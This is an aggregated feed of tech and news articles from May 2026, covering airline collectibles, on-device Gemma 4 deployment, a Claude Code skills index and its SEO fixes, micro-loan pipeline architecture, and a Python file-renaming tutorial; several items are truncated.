> Source: http://www.euronews.com/video/2026/05/24/latest-news-bulletin-may-24th-2026-morning
> wpnews: https://wpnews.pro/news/latest-news-bulletin-may-24th-2026-morning

The article is a morning news bulletin for May 24th, 2026, providing a video summary of the latest stories from Europe and around the world. It covers key topics including world news, business, entertainment, politics, culture, and travel. The bulletin is designed to help viewers catch up on the most important breaking and current events of the day.

Video.
Latest news bulletin | May 24th, 2026 – Morning
Copy/paste the link below:
Copy/paste the article video embed link below:
Updated:
Catch up with the most important stories from around Europe and beyond this May 24th, 2026 - latest news, breaking news, World, Business, Entertainment, Politics, Culture, Travel.

---
## Frequent flyers: How many of these airline collectibles do you have?

> Published: 2026-05-24 05:00:27+00:00
> Source: http://www.euronews.com/travel/2026/05/24/frequent-flyers-how-many-of-these-airline-collectibles-do-you-have
> wpnews: https://wpnews.pro/news/frequent-flyers-how-many-of-these-airline-collectibles-do-you-have

The article discusses various airline collectibles that are popular among frequent flyers and aviation enthusiasts. Notable items include KLM's Delft Blue miniature houses filled with gin, Lufthansa's themed rubber ducks, and Virgin Atlantic's plane-shaped salt and pepper shakers. Other collectibles mentioned are trading cards from US airlines, limited-edition amenity kits, and watches made from decommissioned aircraft skins.

From Lufthansa’s first class ducks to KLM’s miniature houses, these items are a hot commodity among aviation enthusiasts.
For many frequent flyers, racking up airline miles isn’t enough – they need something tangible to show off their status.
Enter: The airline collectible.
From amenity kits to trading cards, there are plenty of ways to show your love of the aviation industry.
Here are some of our favourites.
KLM’s Delft Blue miniature houses
Having first been introduced in the 1950s, KLM’s Delft Blue miniature houses may very well be the collectibles that kicked off the trend.
Gifted to passengers flying business class on an international route, the tiny homes are filled with local gin.
Each year on 7 October, the airline’s anniversary, a new house is depicted. Travellers currently flying business will receive a copy of Villa Rameau in Leiden, a former sexton’s house built in 1645.
The house was chosen this year to mark the USA's semiquincentennial as the city in South Holland is known for having welcomed religious refugees, including the pilgrims who later sailed to the states on the Mayflower.
Lufthansa’s rubber ducks
Passengers who are lucky enough to be flying with Lufthansa in first class have been able to grab themselves a themed duck from the lounges in Frankfurt and Munich since 2004.
While there are standard Lufthansa first class ducks, you can also pick up themed ones tied to events like Oktoberfest, Christmas, and even the FIFA World Cup.
These items are seriously collectible, and can fetch a pretty penny second hand…
Virgin Atlantic’s plane-shaped salt and pepper shakers
First introduced in 2002, Virgin Atlantic’s aircraft-shaped salt and pepper shakers (adorably named Wilbur and Orville for the Wright brothers) have made their way into many a pocket over the years.
So much so that the company pulled them from planes in 2011, only to bring them back the following year – with a new inscription on the base saying they were “pinched from Virgin Atlantic”.
A Virgin Atlantic spokesperson told Euronews Travel: “Many years ago, once we spotted the trend, we decided to lean into the fun by adding the words ‘Pinched from Virgin Atlantic’ to the bottom of their feet. Since then, Wilbur and Orville have become an iconic part of the Virgin Atlantic experience – and a must-have collector’s item for many of our customers.”
Trading cards
Numerous airlines in the US offer trading cards which you can request from the pilot on your flight.
Hawaiian Airlines, for example, has cards for each of its four aircraft – the Boeing 717, Airbus A321neo, Airbus A330 and Boeing 787-9 Dreamliner – which feature fun facts about the plane type and a spot for pilots to autograph.
Last year, Delta unveiled a new centennial-themed trading card collection to mark 100 years since the airline launched.
Limited-edition amenity kits
One of the best parts about flying business or first class are the amenity kits, and airlines are constantly refreshing them by partnering with different cosmetic companies.
But many carriers also release limited-edition kits, giving frequent flyers something to collect.
Late last year, British Airways launched some for its London Gatwick flights, working with British artists to create four different bags.
For this summer, Etihad Airways has unveiled its new kits with LANEIGE skincare, with different coloured bags inspired by the city being flown to.
The one we’re most excited about, however, is American Airlines’ US Soccer themed kits, which come with a crossbody strap so you can use them as a regular bag once the flight is over.
Limited-edition watches made from decommissioned airplanes
You can take your love of aviation to the next level by wearing a piece of aircraft history on your wrist all the time thanks to AIM Watches.
Founded in the UAE, the brand upcycles aircraft skins from around the globe to create timepieces which are hand-assembled in Switzerland.
Limited edition watches currently available include the Frankfurt, made from a Lufthansa Airbus A380, and the Abu Dhabi, created using aircraft skin from the first Airbus A380 flown by Etihad Airways.
Upcoming projects will make use of materials taken from a British Airways Concorde, and an Air France Concorde, with fabric from the original seats used to create the leather straps.
Just 30 pieces will be created from each, and you can keep up to date with the project on the AIM Watches website.
One to keep an eye out for is the Beta Series launch next month, which will use material from G-CIVP, the plane that set the Guinness World Record for the fastest transatlantic flight by a subsonic airliner in 2020.

---
## 5 things `flutter_gemma` doesn't tell you about shipping Gemma 4 on Android

> Published: 2026-05-24 04:59:41+00:00
> Source: https://dev.to/manoj_shetty/5-things-fluttergemma-doesnt-tell-you-about-shipping-gemma-4-on-android-2koj
> wpnews: https://wpnews.pro/news/5-things-flutter-gemma-doesn-t-tell-you-about-shipping-gemma-4-on-android

The article describes five critical challenges the author encountered while shipping a fully offline Gemma 4 AI assistant (PocketClaw) on Android, which are not covered in standard documentation. Key issues include Gemma 4 E2B's sensitivity to prompt structure—where placing user context at the very beginning of the system prompt is essential for recall—and the failure of standard RAG cosine similarity for generic queries like "summarize the document," requiring heuristic fallbacks. The author provides practical fixes, such as using a slot-filling template for system prompts and implementing a `getDocStarts` fallback for queries with no semantic overlap with document chunks.

*This is a submission for the Gemma 4 Challenge: Write About Gemma 4*

I shipped a Gemma 4 assistant on Android in 17 days. Voice, vision, RAG, eight device actions, everything offline once the model is on device. The project is called PocketClaw, and you can read about it [here](https://dev.to/manoj_shetty/how-i-built-a-fully-offline-ai-assistant-on-android-with-gemma-4-e2b-5a19) if that's what you came for.

This post is about the 5 things I had to figure out the hard way. Not in the `flutter_gemma`

README. Not in Google's MediaPipe docs. Not in any of the half-dozen "run Gemma on Android" tutorials I read this week.

If you're about to ship Gemma 4 on Android, I hope this saves you a weekend.

📱

Companion post:[How I built PocketClaw — a fully offline AI assistant on Android with Gemma 4 E2B]. Demo video, architecture deep-dive, full source code.

## 1. Small models drop facts buried mid-prompt. Put what matters at the top.

I've been building agents on Claude and GPT-4 for about 18 months. Both of them handle a long system prompt fine. You can mix instructions and facts in any order, and the model figures out what's a fact versus what's a behavior rule.

Gemma 4 E2B doesn't.

My first system prompt for PocketClaw looked like this:

```
You are Claw. You run locally and offline. You are talking to Manoj Shetty.
Match your answer length to the question. Prefer plain answers over preambles.
Never restate the question. If unsure, say so briefly.
```

User asks "what's my name?" Claw answers "I do not know your name." Every time. The name is sitting right there in sentence three.

I spent about an hour staring at this. My theory after the fact is that "never restate the question" was acting as a dominant instruction, and the model generalized it to "don't reference any user context." That's the kind of overgeneralization a 2B-effective model does. Cloud LLMs don't.

The fix was structural, not lexical:

```
final namePart = (userName != null && userName.trim().isNotEmpty)
    ? "The name of the user is ${userName.trim()}.\n\n"
    : '';
final systemPreamble = '${namePart}You are Claw, ...';
```

Same fact. Moved to the first line of the prompt. On its own. Flat declarative sentence. Worked the first time I tried it.

The lesson generalizes. When you're working with a 2B-class model, anything you actually want the model to remember goes at the front of the prompt, in simple sentences, with no competing instructions in the same paragraph. The model is paying way more attention to the opening than to the middle. Treat the system prompt like a slot-filling template, not a paragraph.

## 2. Vanilla RAG breaks on the queries users actually type.

If you've worked with RAG before, you know the textbook setup. Chunk the document, embed the chunks, store the vectors, embed the query at retrieval time, find the closest matches. Works great on benchmarks where the queries are specific.

It doesn't work on "summarise the document."

I caught this on Friday. I'd been heads-down for two weeks. I thought I had a working build. I uploaded a PDF I had lying around (a paper on edge LLMs), typed "summarise the document", hit send. Claw said "Summarize the document." back to me. Just that. Like an echo. I tried twice more with different phrasing. Same answer.

Eventually I typed "summarise llmaiedge.pdf" with the actual filename. Got a real summary.

The problem is obvious once you see it. "Summarise the document" has zero semantic overlap with the document text. The PDF doesn't contain the words "summarise" or "this document." Cosine similarity returns nothing useful. The retrieved chunk list is empty. Gemma gets the user's question with no actual document context attached. So it does what any LLM does when starved for context. It hallucinates a generic answer from its training data.

The fix I shipped is two heuristics deep:

```
final isGenericIntent = hits.length <= 1 && (
    lower.contains('summari') ||
    lower.contains('tldr') ||
    lower.contains('explain') ||
    lower.contains('describe') ||
    lower.contains('the document') ||
    lower.contains('the pdf')
);

if (isGenericIntent) {
    hits = await RagService.instance.getDocStarts(
        conversationId: _conversation.id,
    );
}
```

`getDocStarts`

is a small fallback method. It runs `searchSimilar`

once per indexed doc, using each doc's filename as the query. Filenames are rare distinctive tokens. Every chunk in the vector store has the filename in metadata. So this pulls back real chunks regardless of how the user phrased their question.

Two lines of conditional logic. The difference between "Claw can summarise PDFs" and "Claw echoes your question back at you."

If you're building RAG on Gemma 4 (or any small on-device model really), test it with generic queries before you ship. Your textbook similarity search will fail in ways that look like the model is broken.

## 3. The flutter_gemma plugin bundles ~33 MB of native libraries you probably don't use.

Stock APK for PocketClaw came out at 185 MB. That felt heavy.

When I unzipped it and looked at the native libs (arm64-v8a only, I was already shipping a single-arch build), this is what I saw:

```
26 MB  libllm_inference_engine_jni.so       (needed)
24 MB  libLiteRtLm.so                       (needed)
17 MB  libgemma_embedding_model_jni.so      (don't use — using Gecko)
17 MB  libgecko_embedding_model_jni.so      (needed)
14 MB  libmediapipe_tasks_vision_jni.so     (needed — vision input)
14 MB  libmediapipe_tasks_vision_image_generator_jni.so  (NOT USED)
10 MB  libimagegenerator_gpu.so             (NOT USED)
8  MB  libLiteRtGpuAccelerator.so           (needed)
8  MB  libLiteRtWebGpuAccelerator.so        (NOT USED — Android has OpenCL)
9  MB  libtext_chunker_jni.so               (needed)
```

The image-generation libs are for using Gemma to *generate* images. PocketClaw only *consumes* images (vision input to multimodal Gemma). I'm never going to generate. The WebGPU accelerator is for browsers — Android uses OpenCL. None of it does anything on my target platform.

Four lines in `android/app/build.gradle.kts`

:

```
packaging {
    jniLibs {
        excludes.addAll(listOf(
            "**/libimagegenerator_gpu.so",
            "**/libmediapipe_tasks_vision_image_generator_jni.so",
            "**/libLiteRtWebGpuAccelerator.so",
            "**/libLiteRtTopKWebGpuSampler.so"
        ))
    }
}
```

APK dropped from 185 MB to 152 MB. 33 MB cut. Vision input still works, embedder still works, inference still works.

If your use case is similar (chat + vision input + RAG, no image generation), copy these excludes. If your use case is different — say you actually want Gemma to generate images — leave the image-gen libs in. The point is, audit what your plugin pulls in and exclude what you don't use. `flutter_gemma`

is built for general capability surface, not minimum-bytes-on-device.

There's a second-order point here that matters more. MediaPipe is the reason `flutter_gemma`

is so big. It's also the reason it handles vision and (in 3n's case) audio. Text-focused alternatives like llama.cpp wrappers can ship at 30-60 MB on Android but with much more limited or no multimodal coverage today. So the choice is really: 152 MB with mature vision support, or 60 MB without. There's no free lunch where you get multimodal at the size of a text-only stack. Pick based on what your product actually needs.

## 4. Don't feed the 128K context window. Compact it.

Gemma 4 has a 128K context window. Sounds great in theory. In practice it's a footgun.

Every token in the prompt costs latency at decode time. Every token costs RAM. On a phone, both of those are tight. If you naively shove the whole chat history into context every turn, you'll find that turn 20 takes noticeably longer than turn 5, and turn 50 might OOM the app.

PocketClaw keeps a sliding window of the most recent 24 messages in their raw form. Anything older runs through a compaction pass:

- Extract explicit facts the user has stated ("I am X", "Remember Y", "My name is Z").
- Capture unresolved goals (keywords like "fix", "todo", "issue").
- Compile both into a single lightweight summary paragraph that gets prepended to the prompt as memory.

That's the chat part. The aggressive part is image handling.

A typical user-uploaded photo is roughly 1 MB. As base64 in a prompt, that's around 30,000 tokens. That's a quarter of the entire 128K context window for one image. If the user uploads three photos across a conversation, your context budget is in trouble.

So PocketClaw does this: when an image message slides past the 24-message boundary, the raw image bytes get deleted from memory. What's preserved is the assistant's prior textual description of that image:

```
String _imageMemoryFromAssistant({
  required String? imageName,
  required String assistantText,
}) {
  final label = imageName ?? 'uploaded image';
  return 'Assistant previously described $label as: '
         '${_shorten(assistantText, 1000)}';
}
```

So Claw still "remembers" what it saw, but only the description goes through the prompt. The 30,000-token base64 blob becomes a 100-token summary. That's roughly a 300x compression of image memory.

The kicker: this works really well for the kind of follow-up questions users actually ask. "What was in that photo I sent earlier?" is answerable from the description alone. The model rarely needs the pixels back. If it does, the user can re-upload.

The general pattern here is: don't think of the context window as "free space up to the limit." Think of it as a budget. Spend it on things the model needs *for the current turn*. Everything else gets compacted to a textual summary.

## 5. Whether audio works in `flutter_gemma`

depends on your model file, not the Gemma version.

This one I want you to know so you don't spend a day chasing the wrong thing like I did.

Gemma 4 E2B's model card lists native audio as a supported modality. So I thought: cool, I'll skip the speech-to-text plugin entirely, feed raw audio bytes straight to Gemma, get a single multimodal call instead of an STT-then-LLM pipeline. Cleaner.

I dug into `flutter_gemma`

v0.15.1 source. The plugin's documentation consistently frames audio as a Gemma 3n E4B feature:

```
/// [supportAudio] — whether the model supports audio (Gemma 3n E4B only).
bool supportAudio = false,
```

That phrasing shows up in eight different files in the plugin. The interface, the API docs, the example app, the native Android side — they all treat audio as 3n territory.

But here's what's interesting once you read further. There is no hardcoded model-version check anywhere in the plugin. The actual gate is just `if (config.supportAudio == true)`

. So what's really limiting audio isn't the Dart code rejecting Gemma 4 — it's whether the model file you downloaded actually contains the audio encoder.

The example app's `model.dart`

has the clearest hint:

```
supportAudio: true,  // .litertlm files have TF_LITE_AUDIO_ENCODER
supportAudio: false, // .task files don't have audio encoder
```

So the real question for any model you want to use with audio isn't "is it Gemma 3n?" — it's "does my `.litertlm`

file include the audio encoder for this model?" The plugin's docs assume the answer is yes only for Gemma 3n E4B because that's what's been tested and shipped that way. For Gemma 4 E2B, the model card says audio is supported by the model itself, but I haven't found a `.litertlm`

build of E2B that bundles the encoder. If one ships, the plugin should handle it — there's no version-gate to stop it.

For PocketClaw I went with Android's system STT (the `speech_to_text`

package). Practical reasons. I get live transcription as the user speaks (text appears word by word while they're holding the mic). That's a noticeably better UX than the "hold, speak, release, wait" pattern you'd get from on-model audio. And it side-steps the question of whether my specific E2B `.litertlm`

file 

---
## How I Indexed 2,000 Claude Code Skills (And What the Install Data Says About AI Coding in 2026)

> Published: 2026-05-24 04:57:53+00:00
> Source: https://dev.to/shenhuang/how-i-indexed-2000-claude-code-skills-and-what-the-install-data-says-about-ai-coding-in-2026-3k80
> wpnews: https://wpnews.pro/news/how-i-indexed-2000-claude-code-skills-and-what-the-install-data-says-about-ai-in

The article describes how the author built a ranked, filterable index of nearly 2,000 public Claude Code skills at orangebot.ai/skills, addressing the lack of a searchable, install-weighted directory in the official registry. The author explains their deliberately simple technical stack—a single JSON file updated by a daily cron job and served by a Next.js page—to minimize operational overhead and avoid database complexity. The post also details an SEO crisis where Google was indexing the page but showing a low 0.12% click-through rate due to missing metadata and empty client-side rendering, which the author diagnosed and began fixing.

## The problem: 2,000 skills, no map

Claude Code skills exploded across 2025 and into 2026. The official registry at [skills.sh](https://skills.sh) and the parallel ecosystem on GitHub now expose well over 2,000 public skills — covering everything from `frontend-design`

patterns to `azure-deploy`

to `nano-banana-pro`

image generation. The format won. Every serious AI coding agent — Claude Code, Cursor, OpenSeek, Codex — now ships some flavor of "loadable context package".

But there is no ranked, install-weighted, searchable index. The registry lists skills alphabetically, paginates them across dozens of pages, and doesn't surface install volume in a way you can sort. You discover a useful skill one of three ways: someone tweets it, you scroll forever, or you already know the author/repo combo. None of those scale past a few hundred skills.

So I built one. [orangebot.ai/skills](https://orangebot.ai/skills) is a ranked, filterable index of 1,998 public Claude Code skills sorted by weekly install volume, tagged by domain, with individual detail pages for the top 50 highest-installed entries. It is the page I wanted six months ago and didn't have.

This post is the build log. Three parts: the stack (boring on purpose), the SEO crisis I walked into and the fix that shipped today, and what the install data actually says about where AI coding tools are headed in 2026.

Source registry: [skills.sh](https://skills.sh). The catalog: [orangebot.ai/skills](https://orangebot.ai/skills).

## The stack (zero infrastructure surprises)

I picked the most boring stack I could justify, on purpose. The catalog is not where I want to spend operational attention — the data pipeline and the SEO are.

-
**Next.js 16 App Router**. Server Components by default so Google sees real HTML, not a JS shell. Routing is filesystem-based, the metadata API is built in. -
**Firebase App Hosting**.`git push`

deploys. No manual ops, no Docker, no Kubernetes. Free tier so far. -
**Cron on a Linux box at home**. A Python scraper runs daily on`lich-ubuntu`

, normalizes install counts and author attribution, and writes a single ~2.5MB`skills_index.json`

to the repo's`public/data/`

directory. When the file changes, the next deploy picks it up. -
**No database at request time**. The Next.js page reads the JSON at revalidate time (every 6 hours). Firebase serves the rendered HTML. No Postgres, no Redis, no Firestore call on the hot path.

That's the whole architecture. One JSON file, one Next.js page, one daily cron. The catalog routes in the repo:

```
src/app/skills/page.js              # SSR catalog (server component)
src/app/skills/SkillsClient.js      # interactive island (search/filter/sort)
src/app/skills/[category]/page.js   # domain filter pages
src/app/s/[id]/page.js              # individual skill detail page (top 50)
public/data/skills_index.json       # 1,998 entries, ~2.5MB
```

Honest disclosure on the data freshness: `skills_index.json`

is regenerated weekly-ish during active development as I iterate on the parser. The production cron — separate Python service on `lich-ubuntu`

— is what stabilizes it to daily; that part is still rolling out. So treat the snapshot as recent, not "fresh this morning".

The decision I keep being asked about is "why not a database". Two reasons. First, the catalog is read-mostly and changes once a day — that is the canonical shape of a static JSON file, not a row store. Second, every database I'd add is a thing that can break at 2am while I'm asleep. A JSON file in `public/`

cannot break. It can be wrong, but it cannot be down.

The pillar guide that links into the catalog lives at [orangebot.ai/blog/claude-code-skills-guide](https://orangebot.ai/blog/claude-code-skills-guide). It's the long-form companion — what skills are, how to install them, when to pick a skill vs an MCP server.

## The SEO crisis I didn't see coming

Six months after the catalog went live, I finally opened Google Search Console. The numbers were ugly.

**21 of 186 known URLs indexed. 11.3%.**- 151 URLs sitting in "Discovered – currently not indexed".
`last_crawled`

timestamps were the 1969-12-31 Unix epoch — Google had registered the URLs from my sitemap and then never bothered to fetch them. - The
`/skills`

page alone was getting**5,651 impressions per week** but a**0.12% CTR**. People were seeing the page in search results, then bouncing past it.

That is the failure mode for a content site. I had built the catalog, written the pillar guide, submitted the sitemap, and Google's verdict was a polite "no thanks". The 5,651 impressions were good news in disguise — the demand was real; the page just couldn't convert it because the SERP snippet was the generic brand tagline (no `generateMetadata`

) and the rendered HTML was an empty client shell.

I spent a day diagnosing it instead of pushing more content. Three root causes:

**Root cause 1 — the catalog page was a client component.** The top of `src/app/skills/page.js`

had `'use client'`

. The server-rendered HTML was an empty `<div>`

. Googlebot does run JS, eventually, but it queues JS-heavy pages on a much slower second pass, and for low-authority sites it often skips the second pass entirely. So Google saw a blank page, picked up the brand-tagline title from the root layout, and ranked accordingly.

**Root cause 2 — sitemap pollution.** Next.js App Router auto-generates routes from `metadata`

files like `opengraph-image.js`

, `twitter-image.js`

, `icon.js`

. My `next-sitemap.config.js`

was pulling all of them into `sitemap.xml`

, plus eight stale scaffold routes I never finished (`/cjobs`

, `/mnews`

, `/jobmatch`

, `/jobs`

, `/datajobs`

, `/photographer`

, `/prop`

, `/startups`

). Google saw 173 sitemap entries, found ~18 weren't HTML and another 8 returned thin/empty pages, and started treating the whole sitemap as low-trust.

**Root cause 3 — the homepage didn't link to /skills, /tools, or /digest in visible HTML.** The nav was inside a `<details>`

element that collapsed by default. Googlebot reads `<details>`

content fine, but the absence of a prominent above-the-fold internal link to /skills meant the catalog was getting near-zero internal PageRank from the homepage.

Three causes, four commits.

## The fix: 4 commits, ~180 file-changes (shipped 2026-05-23)

Four commits today, between 11:15 and 18:59 PDT: `e9b4ba0`

(SSR-ify /skills /tools /news, clean sitemap, add hub nav), `d09e0e4`

(CTR titles, EEAT author page, 5 tools SSR, news sitemap), `4442629`

(P1+P2 push — 5 more tools SSR, deep compare pages, blog framework + 8 posts), `505ec1d`

(P3 push — 23 tools SSR, 50 skill detail pages, hub depth, OG image, newsletter). Cumulative session touched ~180 file-changes across the four commits per the P3 commit message.

**Commit 1 — convert /skills and the other hub routes from client components to a server-shell + client-island pattern.** This is the generally useful pattern I'd recommend to anyone running into the same problem. The shape is:

``` python
// src/app/skills/page.js  — Server Component (NO 'use client')
import fs from 'node:fs/promises';
import path from 'node:path';
import SkillsClient from './SkillsClient';

export const revalidate = 21600; // 6 hours

export const metadata = {
  title: '2,000+ Best Claude Code Skills (2026): Top Skills by Installs & Stars',
  description: 'A working library of Claude Code skills from across GitHub...',
  alternates: { canonical: '/skills' },
};

export default async function SkillsPage() {
  const raw = await fs.readFile(
    path.join(process.cwd(), 'public', 'data', 'skills_index.json'),
    'utf-8'
  );
  const allSkills = JSON.parse(raw);
  const topSkills = [...allSkills]
    .sort((a, b) => (b.installs || 0) - (a.installs || 0))
    .slice(0, 60);

  const itemListJsonLd = {
    '@context': 'https://schema.org',
    '@type': 'ItemList',
    numberOfItems: topSkills.length,
    itemListElement: topSkills.map((s, i) => ({
      '@type': 'ListItem',
      position: i + 1,
      name: s.name,
      url: s.repository,
    })),
  };

  return (
    <>
      <script
        type="application/ld+json"
        dangerouslySetInnerHTML={{ __html: JSON.stringify(itemListJsonLd) }}
      />
      <details>
        <summary>Text view · {allSkills.length} skills</summary>
        <h1>Claude Code Skills Index</h1>
        <ol>
          {topSkills.map((s) => (
            <li key={`${s.source}-${s.skillId}`}>
              <a href={s.repository}><strong>{s.name}</strong></a>
              {' '}by @{s.source} — {s.weeklyInstalls} installs/wk
            </li>
          ))}
        </ol>
      </details>
      <SkillsClient />
    </>
  );
}
```

The trick: the server emits the real top-60 list inside a `<details>`

block (collapsed for users, fully readable for crawlers) plus a JSON-LD `ItemList`

schema, and only then mounts the interactive `<SkillsClient />`

. Google indexes the static list. Users get the interactive shell. Both reads are served from the same render.

**Commit 2 — clean the sitemap.** Excluded `/*/opengraph-image`

, `/*/twitter-image`

, `/*/icon`

, `/feed.xml`

, `/feed.json`

, `/feed/*`

, `/api/*`

, and the eight stale scaffold routes from `next-sitemap.config.js`

. Sitemap went 173 → 154 (cleanup), then later commits added `/blog/*`

posts and 50 `/s/[id]`

detail pages, bringing it to **219 URLs today**. All current entries return HTML with `<title>`

and `<meta description>`

.

**Commit 3 — visible homepage nav.** Added a `<nav aria-label="Site sections">`

block at the top of the homepage with plain anchor tags to `/skills`

, `/tools`

, `/digest`

, `/news`

, `/blog`

, `/sources`

, `/topics`

, `/year/2026`

, `/compare`

. No `<details>`

, no JS, no collapse. Boring. Crawlable.

**Commit 4 — depth on /tools, /blog, /s/[id], OG images, newsletter.** SSR'd 33 of 36 tool pages (each with HowTo / FAQPage / SoftwareApplication / BreadcrumbList JSON-LD), shipped 13 blog posts as the editorial layer, built 50 individual `/s/[id]`

skill detail pages, added a dynamic `next/og`

card per blog post, and embedded Substack signup on every post page.

Expected D7 trajectory (forecast, not measured — post deploys today): indexed URLs **30-40** by 2026-05-30, **60-80** by 2026-06-06. The new `/skills`

title — "2,000+ Best Claude Code Skills (2026): Top Skills by Installs & Stars" — replaces the generic brand tagline that was driving the 0.12% CTR. I'll update this post with measured GSC numbers once the D7 pull lands.

## What the install data says about AI coding in 2026

The catalog gives a daily-updated view into which skills people actually install. Here is the top 10 by weekly installs, pulled directly from `skills_index.json`

:

| Rank | Skill | Author | Installs |
|---|---|---|---|
| 1 | find-skills | vercel-labs/skills | 753,732 |
| 2 | vercel-react-best-practices | vercel-labs/agent-skills | 256,738 |
| 3 | frontend-design | anthropics/skills | 212,072 |
| 4 | web-design-guidelines | vercel-labs/agent-skills | 206,584 |
| 5 | remotion-best-practices | remotion-dev/skills | 182,063 |
| 6 | azure-ai | microsoft/github-copilot-for-azure | 146,196 |
| 7 | azure-deploy | microsoft/github-copilot-for-azure | 145,787 |
| 8 | azure-storage | microsoft/github-copilot-for-azure | 145,752 |
| 9 | azure-cost-optimization | microsoft/github-copilot-for-azure | 145,752 |
| 10 | azure-diagnostics | microsoft/github-copilot-for-azure | 145,697 |

Four things jump out.

** find-skills is #1 with 753K weekly installs.** A meta-skill — a skill whose only job is to discover other skills — outranks every domain-specific skill in the index by roughly 3x. The discovery layer is the actual moat. That's the thesis behind this entire catalog. The #1 skill is published by

`vercel-labs/skills`

, not Anthropic, which is itself a tell about who is racing to own the discovery primitive. Detail page: [orangebot.ai/s/find-skills](https://orangebot.ai/s/find-skill

---
## Architecting Instant Micro-Loans: Data Pipelines and KYC Automation

> Published: 2026-05-24 04:57:28+00:00
> Source: https://dev.to/loaneligstatus/architecting-instant-micro-loans-data-pipelines-and-kyc-automation-27oj
> wpnews: https://wpnews.pro/news/architecting-instant-micro-loans-data-pipelines-and-kyc-automation

The article describes a modern micro-lending architecture that processes loan applications in under 90 seconds using event-driven data pipelines, KYC automation, and machine learning. It details how the system ingests user data through APIs, validates identity via registries like UIDAI, and parses alternative data sources such as bank statements and device telemetry to compute risk scores. The underwriting process combines ensemble models like XGBoost and LSTM networks, with explainability provided through SHAP values, to enable rapid decisions for urgent small-ticket loans.

Modern micro-lending platforms process loan applications in under 90 seconds by orchestrating event-driven data pipelines, regulatory-compliant KYC automation, and machine learning-powered underwriting. For a typical ₹1,000 instant loan, the system ingests user consent signals, validates identity through API federations, parses alternate data sources, computes risk scores, and triggers bank disbursals via account aggregator frameworks.
The reference architecture follows a hexagonal design with clear separation between ingestion, processing, decision, and fulfillment layers. Apache Kafka serves as the backbone for real-time event streaming, while Kubernetes-orchestrated microservices handle individual concerns. All components maintain audit logs in immutable storage to satisfy RBI guidelines on digital lending.
Data flows begin when a user authenticates through the mobile app using OAuth 2.1 and grants explicit consent via Account Aggregator (AA) frameworks like Finvu or OneMoney. This consent triggers a cascade of events across secured channels.
Ingestion starts with a high-throughput API gateway built on Kong or AWS API Gateway. User-provided information—PAN, Aadhaar number (masked), phone, and bank account—lands in a validation service that performs synchronous checks against CKYC registry and UIDAI e-KYC endpoints.
Alternate data parsing forms the core differentiation. The pipeline consumes device telemetry (with consent), SMS permissions for bank statement parsing, and consented GST or electricity bill data. Custom Apache NiFi or AWS Glue jobs normalize unstructured inputs: PDF bank statements are OCR-processed using Tesseract with custom LSTM post-correction models, then parsed into structured transaction graphs using rule engines and graph databases like Neo4j.
These events publish to Kafka topics partitioned by user_id and risk_tier. Spark Streaming or Flink applications consume these streams for feature engineering—calculating velocity of transactions, merchant category entropy, and repayment capacity proxies. Features land in a feature store (Feast or custom Redis + PostgreSQL) with TTL-based versioning for reproducibility.
KYC automation eliminates manual verification queues. Upon consent, the system calls UIDAI's e-KYC API with encrypted Aadhaar details, receiving XML responses containing demographic data and photograph. Face matching runs via AWS Rekognition or open-source DeepFace models, achieving sub-300ms latency with 99.2% accuracy thresholds.
For video KYC (required for higher ticket sizes), WebRTC streams feed into liveness detection models that analyze micro-expressions and challenge-response prompts. All PII routes through Vault for secrets management and encryption at rest using AES-256 with customer-managed keys.
Deduplication logic queries a Cassandra cluster using fuzzy matching on name + DOB + address embeddings generated by Sentence-BERT models. Matches above 0.85 cosine similarity flag for manual review, though under 3% of applications reach this stage in mature systems.
The underwriting service represents the decision heart. It aggregates features from the feature store, runs them through an ensemble of models: XGBoost for traditional credit factors, LSTM networks for transaction sequence modeling, and graph neural networks for social or merchant network risk.
**In the underwriting section, when evaluating urgent small-ticket applications, the system surfaces contextual eligibility directly, allowing users to proceed seamlessly with queries like i need 1000 rupees loan urgently.
Risk scoring combines bureau data (CIBIL, Experian) where available with alternate signals. A typical model might assign weights: 35% to repayment history proxies, 25% to income stability from cashflow analysis, 20% to device and behavioral signals, and 20% to macroeconomic factors. Thresholds adjust dynamically based on portfolio performance using multi-armed bandit algorithms.
Explainability remains critical. SHAP values generate human-readable reasons for each decision, stored alongside the application for regulatory audits. If the composite score exceeds 650 (on a custom 300-900 scale), the application moves to approval. For ₹1,000 loans, approval rates often exceed 65% due to lower exposure.
Upon approval, the system generates a digital loan agreement using DocuSign APIs or in-house eSign solutions compliant with IT Act. The borrower electronically signs via Aadhaar-based eSign.
Disbursal orchestration uses RazorpayX, Cashfree, or direct NPCI API integrations for IMPS/NEFT. Account validation precedes transfer through penny drop verification. For sub-₹2,000 loans, UPI credit via linked accounts enables near-instantaneous crediting, often completing under 15 seconds post-approval.
The repayment engine schedules EMIs or bullet repayments through UPI mandates or auto-debit. Delinquency detection triggers early warning systems that analyze real-time cashflow for restructuring offers.
Production deployments handle 50,000+ concurrent applications during peak hours using auto-scaling groups and circuit breakers (Resilience4j). Prometheus and Grafana monitor end-to-end latency, with OpenTelemetry tracing across services. Chaos engineering regularly validates resilience against database failures or third-party API degradations.
Data privacy follows differential privacy techniques for aggregate analytics while maintaining strict isolation. All models undergo periodic bias audits and retraining on fresh data windows.
Teams building these systems should prioritize consent management platforms that support granular permissions. Choose languages wisely: Go for low-latency services, Python for ML components. Infrastructure-as-code via Terraform ensures repeatable environments across regions.
Security demands zero-trust architecture with mTLS between services and regular penetration testing. Cost optimization comes from serverless components for sporadic workloads while keeping core decision engines warm.
The evolution of instant micro-loans demonstrates how thoughtful data pipeline design, combined with regulatory-first automation, creates accessible credit products. For developers architecting similar platforms, focus on composable services that can adapt to evolving RBI guidelines and emerging data sources like Open Credit Enablement Network (OCEN).
This architecture not only processes a ₹1,000 loan end-to-end within minutes but does so with transparency, fairness, and scale. The technical patterns event sourcing, feature stores, and API-first compliance—extend beyond lending into any domain requiring real-time risk decisions.

---
## Bulk Rename Files from the Command Line with Python

> Published: 2026-05-24 04:54:07+00:00
> Source: https://dev.to/nportercodes/bulk-rename-files-from-the-command-line-with-python-3ld8
> wpnews: https://wpnews.pro/news/bulk-rename-files-from-the-command-line-with-python

This article explains how to rename multiple files from the command line using a simple Python script. The provided script uses the `os` and `sys` modules to iterate through files in a directory, adding a specified prefix to each filename. It also mentions a more advanced tool called Bulk Renamer Pro, which is built with Python 3 and has no external dependencies.

# Bulk Rename Files from the Command Line with Python

Renaming hundreds of files manually is tedious. Here is how to do it with a simple Python script.

## The Problem

You have a folder full of photos and you need to add prefixes, change extensions, or convert case.

## Quick Solution

``` python
import os, sys

def rename_files(directory, prefix=""):
    for f in os.listdir(directory):
        fp = os.path.join(directory, f)
        if not os.path.isfile(fp): continue
